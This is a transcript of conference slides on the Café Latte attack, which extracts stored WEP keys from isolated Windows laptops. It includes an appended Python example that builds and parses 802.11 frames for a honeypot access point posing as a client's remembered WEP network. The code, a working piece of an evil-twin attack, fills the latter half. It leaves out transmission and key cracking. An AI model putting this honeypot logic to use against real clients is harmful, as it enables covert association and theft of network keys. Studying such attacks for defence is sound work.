Cafe Latte

  1. Café Latte with a Free Topping of Cracked WEP: Retrieving WEP Keys from Road-Warriors. Vivek Ramachandran, MD Sohail Ahmad
  2. Talk Outline
     - WEP cracking: a quick primer
     - Debunking the myths of WEP cracking: Café Latte
     - Café Latte: attack background
     - Café Latte: detailed analysis
     - Countermeasures against Café Latte
     - Conclusions
     - Q&A
  3. Cracks in WEP: Historic Evolution
     - 2001: "The insecurity of 802.11", N. Borisov, I. Goldberg and D. Wagner, Mobicom, July 2001.
     - 2001: "Weaknesses in the key scheduling algorithm of RC4", S. Fluhrer, I. Mantin, A. Shamir, August 2001.
     - 2002: "Using the Fluhrer, Mantin, and Shamir Attack to Break WEP", A. Stubblefield, J. Ioannidis, A. Rubin.
     - 2004: KoreK improves on the above technique and reduces the complexity of WEP cracking; only around 500,000 packets are now needed to recover the WEP key.
     - 2005: Andreas Klein finds more correlations between the RC4 key stream and the key.
     - 2007: PTW (Pyshkin, Tews, Weinmann) extend Klein's technique to simplify WEP cracking further; around 60,000 to 90,000 packets now suffice to recover the WEP key.
     - Is there really a need for a new attack?
  4. Limitations of Traditional WEP Cracking
     - The attacker needs to be in the RF vicinity of the WEP network
     - The authorized network must have at least one AP up and running that the clients can connect to
     (Diagram: Client, AP, Hacker)
  5. An Example Scenario Where Traditional Approaches Fail
     - An isolated client far away from the authorized network
     - This client has a WEP-encrypted network "Toorcon" in its PNL
     - Can we crack the WEP key of "Toorcon" using only this client?
     - Can we get IP-layer connectivity to this client?
     (Diagram: Hacker, Victim.) WEP cracking fails! Café Latte attack to the rescue!
  6. What Is the Café Latte Attack?
     - We attack the client to retrieve the WEP key
     - The client can be completely isolated and nowhere near the authorized network
     - There is no need for an authorized network AP
     (Diagram: Hacker, Client, Moon: no AP needed)
  7. Before We Begin: A Quick 101!
  8. Attack Background: Windows Wireless Configuration Manager
     - The user connects to a WEP-protected network "Default" for the first time
     - The user enters the WEP key when prompted by the Windows wireless utility
     - "Default" gets added to the Preferred Network List (PNL) of the configuration manager
  9. Attack Background: Conclusions
     - Windows stores the SSID and the WEP key in its Preferred Network List (PNL)
     - Question: can we retrieve the WEP key from this client, e.g. at a coffee shop?
     - Answer: the Café Latte attack
  10. Can We Crack WEP with Just an Isolated Client?
     - To crack WEP we need a large number of encrypted data packets
       - about 90k for PTW
       - about 500k for KoreK+FMS
     - It does not matter which device produces these packets, client or AP
     - Is it possible to make the client produce data packets without connecting to the authorized network's AP?
     (Diagram: Client)
  11. Café Latte: How Does It Work?
     - The client probes for SSID "Default"
     - The hacker sniffs these probes and brings up a honeypot with the same SSID
     - The client authenticates and associates with this honeypot
     - Fake authentication and association work because WEP has no mutual authentication: the AP never has to prove it knows the key
     (Diagram: client and honeypot both labelled "Default")
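The exchange on the last slide, as an added example that is not part of the original deck and not the authors' tool: the client side builds the directed probe request, Open System authentication request and association request a road-warrior sends for a PNL entry, and the honeypot side parses the probe, answers as the probed SSID with the Privacy (WEP) capability bit set, and completes authentication and association without ever holding the WEP key. It only builds and parses 802.11 management frames (layouts per the standard, radiotap header omitted); putting them on the air needs a monitor-mode interface and frame injection, which is assumed and not shown. The MAC addresses, the channel and the choice to answer every directed probe (a real attacker picks one sniffed SSID) are assumptions for the illustration.

```python
# Caffe Latte honeypot side, frames only (no radio): parse the client's probe
# request, answer as the probed SSID with the Privacy (WEP) bit set, then complete
# Open System authentication and association without knowing the key.
# Illustrative example; 802.11 management frame layouts, radiotap header omitted.
import struct

ASSOC_REQ, ASSOC_RESP, PROBE_REQ, PROBE_RESP, AUTH = 0, 1, 4, 5, 11  # mgmt subtypes
CAP_ESS, CAP_PRIVACY = 0x0001, 0x0010   # capability bits; Privacy = encrypted (WEP)
BCAST = b"\xff" * 6
RATES_IE = bytes([1, 1, 0x82])          # Supported Rates IE: 1 Mbps (basic)

def mgmt_header(subtype, da, sa, bssid, seq=0):
    return struct.pack("<BBH6s6s6sH", subtype << 4, 0, 0, da, sa, bssid, seq << 4)

def parse_mgmt(frame):
    fc, _fl, _dur, da, sa, bssid, _seq = struct.unpack_from("<BBH6s6s6sH", frame)
    return {"type": (fc >> 2) & 3, "subtype": fc >> 4,
            "da": da, "sa": sa, "bssid": bssid, "body": frame[24:]}

def parse_ies(body):
    """Information elements as {tag: value}; tag 0 is the SSID."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        tag, ln = body[i], body[i + 1]
        ies[tag] = body[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies

def ssid_ie(ssid):
    return bytes([0, len(ssid)]) + ssid.encode()

# --- client side: what a road-warrior's PNL scan and join attempt send ---
def build_probe_request(client, ssid):
    return mgmt_header(PROBE_REQ, BCAST, client, BCAST) + ssid_ie(ssid) + RATES_IE

def build_auth_request(client, ap):            # Open System, sequence 1
    return mgmt_header(AUTH, ap, client, ap) + struct.pack("<HHH", 0, 1, 0)

def build_assoc_request(client, ap, ssid):     # capability, listen interval, IEs
    body = struct.pack("<HH", CAP_ESS | CAP_PRIVACY, 10) + ssid_ie(ssid) + RATES_IE
    return mgmt_header(ASSOC_REQ, ap, client, ap) + body

# --- honeypot side ---
def probed_ssid(frame):
    """(ssid, client_mac) for a directed probe request, else None.
    A wildcard probe (empty SSID) leaks no PNL entry, so it is ignored."""
    m = parse_mgmt(frame)
    if m["type"] != 0 or m["subtype"] != PROBE_REQ:
        return None
    ssid = parse_ies(m["body"]).get(0, b"")
    return (ssid.decode("utf-8", "replace"), m["sa"]) if ssid else None

def build_probe_response(hp, client, ssid, channel):
    # timestamp, beacon interval (TU), capability ESS+Privacy: the client takes
    # this for its WEP network and will encrypt with the stored key.
    body = struct.pack("<QHH", 0, 100, CAP_ESS | CAP_PRIVACY)
    body += ssid_ie(ssid) + RATES_IE + bytes([3, 1, channel])   # DS Parameter Set
    return mgmt_header(PROBE_RESP, client, hp, hp) + body

def handle_frame(frame, hp, channel=6):
    """Frames the honeypot (MAC hp) transmits in reply to one captured frame."""
    m = parse_mgmt(frame)
    if m["type"] != 0:
        return []
    if m["subtype"] == PROBE_REQ:
        hit = probed_ssid(frame)     # a real attacker fixes one sniffed SSID
        return [build_probe_response(hp, hit[1], hit[0], channel)] if hit else []
    if m["da"] != hp:
        return []
    if m["subtype"] == AUTH:
        alg, seq, _st = struct.unpack_from("<HHH", m["body"])
        if alg == 0 and seq == 1:    # reply sequence 2, status 0 (success):
            # the AP never proves it holds the WEP key (no mutual authentication)
            return [mgmt_header(AUTH, m["sa"], hp, hp) + struct.pack("<HHH", 0, 2, 0)]
    if m["subtype"] == ASSOC_REQ:    # status 0, AID 1 (two high bits set per spec)
        body = struct.pack("<HHH", CAP_ESS | CAP_PRIVACY, 0, 0xC001) + RATES_IE
        return [mgmt_header(ASSOC_RESP, m["sa"], hp, hp) + body]
    return []

def advertises_wep(frame):
    """True if a probe response sets Privacy with no RSN IE (WPA2) present.
    (A WPA1 network would carry a vendor IE 221 instead; not checked here.)"""
    m = parse_mgmt(frame)
    cap = struct.unpack_from("<H", m["body"], 10)[0]
    return bool(cap & CAP_PRIVACY) and 48 not in parse_ies(m["body"][12:])

def auth_fields(frame):
    """(algorithm, sequence, status) of an authentication frame."""
    return struct.unpack_from("<HHH", parse_mgmt(frame)["body"])

if __name__ == "__main__":
    client, hp = bytes.fromhex("001122334455"), bytes.fromhex("6677889900aa")
    for f in (build_probe_request(client, "Default"), build_auth_request(client, hp),
              build_assoc_request(client, hp, "Default")):
        for reply in handle_frame(f, hp):
            print(parse_mgmt(reply)["subtype"], reply.hex())
```

Two details matter for the attack: the honeypot must set the Privacy bit, otherwise the client will not treat the network as its stored WEP entry, and a wildcard probe (empty SSID) gives the attacker nothing, which is why the attack relies on clients that actively probe for PNL entries by name. After association the client starts sending WEP-encrypted data frames (DHCP, ARP) with the stored key; turning those into the packet volume the previous slide asks for is the part of the attack the deck covers next and is not shown here.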